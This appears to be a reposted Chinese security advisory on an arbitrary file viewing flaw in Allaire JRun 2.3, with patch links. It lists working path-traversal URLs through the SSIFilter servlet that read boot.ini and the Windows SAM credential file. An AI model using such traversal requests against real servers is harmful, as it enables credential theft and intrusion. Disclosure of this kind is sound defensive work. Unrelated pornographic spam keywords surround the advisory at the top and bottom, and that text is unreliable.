六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

Allaire JRUN 2.3 查看任意文件漏洞

[摘要]涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細: Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務器上查看...
涉及程序:
JRUN

描述:
Allaire JRUN 2.3 查看任意文件漏洞

詳細:
Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼。
JRun 2.3 使用 Java Servlets 解析各種各樣類型的頁面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件設置,可能利用URL前綴"/servlet/"調用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目標系統上檢索任意的文件。下列 2 個例子顯示出能被用來檢索任意的文件的 URLs :

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假設JRun在主機“ jrun ”上運行,端口8000。

受影響的系統:
Allaire JRun 2.3.x

解決方案:
下載并安裝補丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar





主站蜘蛛池模板: 在线观看免费黄视频 | 中文字幕在线观看第一页 | 亚洲成人日韩 | 亚洲va久久久噜噜噜久久 | 天天干天天操天天操 | 欧美淫片| 在线看片h站 | 五月婷六月婷婷 | 欧美无遮挡一区二区三区 | 四虎影院永久网址 | 日韩精品导航 | 亚洲精品福利在线观看 | 婷婷免费在线 | 亚洲人一区| 亚洲免费福利 | 色天天干 | 亚洲人成在线播放网站岛国 | 日本黄 色 成 年 人免费观看 | 天天干天天做天天射 | 伊人久久大香线蕉观看 | 天天做日日爱 | 日本激情视频网站 | 在线观看免费日本 | 热热99 | 亚洲成人三级 | 青娱乐国产精品视频 | 中文字幕乱码系列免费 | 日本一道dvd在线播放 | 色橹橹欧美在线观看高清视频 | 日本黄色福利视频 | 日韩亚洲一区中文字幕在线 | 青娱乐在线视频免费观看 | 日本在线观看一级高清片 | 色六月丁香 | 伊人久久五月 | 午夜微博 | 一级a毛片免费观看久久精品 | 婷婷丁香综合网 | 特级淫片国产免费高清视频 | 中国与黑人xxxx视频 | 欧日韩不卡在线视频 |